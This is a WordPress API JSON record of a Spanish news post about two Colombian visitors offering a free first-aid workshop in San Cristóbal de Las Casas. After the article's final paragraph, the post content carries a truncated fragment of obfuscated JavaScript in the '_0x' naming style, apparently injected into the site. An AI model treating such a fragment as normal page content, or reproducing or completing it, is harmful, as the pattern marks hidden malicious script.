{"id":1077,"date":"2022-04-05T03:40:55","date_gmt":"2022-04-05T03:40:55","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=1077"},"modified":"2022-04-05T03:40:56","modified_gmt":"2022-04-05T03:40:56","slug":"colombianos-brindan-capacitacion-en-primeros-auxilios","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=1077","title":{"rendered":"Colombianos brindan capacitaci\u00f3n en primeros auxilios"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-04-at-5.09.59-PM-1-1024x768.jpeg\" alt=\"\" class=\"wp-image-1078\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-04-at-5.09.59-PM-1-1024x768.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-04-at-5.09.59-PM-1-300x225.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-04-at-5.09.59-PM-1-768x576.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/04\/WhatsApp-Image-2022-04-04-at-5.09.59-PM-1.jpeg 1040w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- La sic\u00f3loga Ana Mar\u00eda Jaramillo y el m\u00e9dico Juan Camilo Duque, colombianos que est\u00e1n de visita en Chiapas, ofrecen a la poblaci\u00f3n un programa de Primeros Auxilios de manera gratuita, en reciprocidad al buen recibimiento que han tenido de los sancristobalenses.<\/p>\n\n\n\n<p>En entrevista, Juan Camilo Duque dijo que se quedar\u00e1n varios d\u00edas en la ciudad porque se encuentran viajando con un proyecto que trata de capacitar en primeros auxilios a las comunidades de cualquier tipo, \u201cqueremos ense\u00f1ar a la gente a c\u00f3mo hacer un masaje cardiaco, como atender determinada situaci\u00f3n de emergencia que puede ocurrir con un familiar, un ser querido, un compa\u00f1ero de trabajo\u201d.<\/p>\n\n\n\n<p>\u201cEl taller est\u00e1 dise\u00f1ado para que sea corto, son situaciones puntuales, es una conversaci\u00f3n que hacemos entre todos, este taller lo hemos hecho en varias partes de M\u00e9xico y los resultados han sido buenos, la gente ha aprendido bastante. Cualquier persona que est\u00e9 interesada en asistir al taller puede contactar con nosotros a trav\u00e9s de las redes sociales Programa Primeros Auxilios\u201d.<\/p>\n\n\n\n<p>Ana Mar\u00eda Jaramillo coment\u00f3 que el proyecto es pr\u00e1ctico, din\u00e1mico, donde abordan diferentes temas asociados a la demanda del lugar, \u201cpodemos hablar de primeros auxilios, de c\u00f3mo transportar a un paciente, c\u00f3mo abordar una situaci\u00f3n de consumo de sustancias en general, de eso trata el taller, hay pr\u00e1cticas\u201d.<\/p>\n\n\n\n<p>Asimismo, consider\u00f3 que es importante las empresas se interesen por este tipo de cursos, sobre todo en establecimientos de bares, caf\u00e9s, restaurantes, hoteles, \u201cnadie est\u00e1 exento de una situaci\u00f3n de riesgo, cualquier cosa puede pasar, el taller tentativamente ser\u00e1 en el Centro Cultural del Carmen, vamos a confirmar la fecha en los pr\u00f3ximos d\u00edas, por eso queremos hacer la invitaci\u00f3n del taller gratuito\u201d.<\/p>\n\n\n\n<p>Finalmente, se\u00f1alaron que continuar\u00e1n su viaje a Centro y Sudam\u00e9rica, para impartir este taller y dejar una huella o una aportaci\u00f3n social, en cada lugar que visitan.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- La sic\u00f3loga Ana Mar\u00eda Jaramillo y el m\u00e9dico Juan Camilo Duque, colombianos que est\u00e1n de visita en Chiapas, ofrecen a la poblaci\u00f3n un programa de Primeros Auxilios de manera gratuita, en reciprocidad al buen recibimiento que han tenido de los sancristobalenses. En entrevista, Juan Camilo Duque dijo que &hellip;<\/p>\n","protected":false},"author":2,"featured_media":1078,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-1077","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1077","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1077"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1077\/revisions"}],"predecessor-version":[{"id":1079,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/1077\/revisions\/1079"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/1078"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1077"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1077"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1077"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}